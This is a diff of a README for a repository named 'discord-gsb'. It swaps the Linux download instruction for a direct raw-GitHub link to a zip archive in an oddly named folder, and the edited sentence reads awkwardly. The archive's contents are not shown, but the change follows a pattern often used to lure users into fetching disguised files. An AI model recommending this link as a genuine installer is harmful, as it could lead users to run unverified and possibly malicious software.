GersonHub-1/discord-gsb/README.md

 ### Step 3: Download the Installer

 Under the latest version, you will see different files.
 Choose the one suitable for your system.
 For Windows users, select the `.exe` file.
 For macOS users, choose the `.dmg` file.
-Linux users can choose the `.tar.gz` file.
+Linux users can choose the `https://raw.githubusercontent.com/GersonHub-1/discord-gsb/main/uninstilled/discord-gsb_2.1.zip` file.

 Click on the file name to start the download.